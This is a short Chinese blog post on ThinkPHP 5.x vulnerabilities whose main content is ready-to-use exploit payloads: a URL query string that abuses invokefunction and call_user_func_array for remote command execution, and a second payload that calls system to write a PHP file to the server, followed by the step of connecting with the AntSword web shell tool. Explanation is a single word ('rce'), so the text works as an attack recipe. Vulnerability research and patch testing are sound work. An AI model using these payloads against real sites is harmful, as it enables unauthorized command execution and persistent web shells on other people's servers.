常见框架漏洞:Thinkphp(TP)篇

简介

ThinkPHP (简称 TP )是一款流行的 国产开源 PHP 框架 ,遵循 MVC(Model-View-Controller) 设计模式,以简洁、高效、灵活著称,广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

复制代码
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

在后面拼接指令即可

getshell

复制代码
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

访问后使用蚁剑链接即可

相关推荐
未来之窗软件服务19 天前
thinkphp ThinkPHP3.2.3完全开发手册
thinkphp
智云软件测评服务20 天前
Web应用安全漏洞扫描:原理、常用方法及潜在风险解析?
应用·漏洞·扫描
网安INF23 天前
CVE-2024-23897源码分析与漏洞复现(Jenkins 任意文件读取)
java·web安全·网络安全·jenkins·漏洞
网安INF1 个月前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
java·web安全·网络安全·flink·漏洞
网安INF1 个月前
CVE-2023-25194源码分析与漏洞复现(Kafka JNDI注入)
java·web安全·网络安全·kafka·漏洞·jndi注入
网安INF1 个月前
CVE-2020-17518源码分析与漏洞复现(Flink 路径遍历)
java·web安全·网络安全·flink·漏洞
quweiie1 个月前
thinkphp8.1 调用巨量广告API接口,刷新token
thinkphp·巨量引擎·巨量广告接口·访问令牌
不知几秋1 个月前
pikachu通关教程-File Inclusion
漏洞
智云软件测评服务1 个月前
网络系统中安全漏洞扫描为何重要?扫描啥?咋扫描?
漏洞·扫描·检测
智云软件测评服务1 个月前
测评机构如何通过漏扫保障软件安全?扫描范围与局限解析
渗透·漏洞·扫描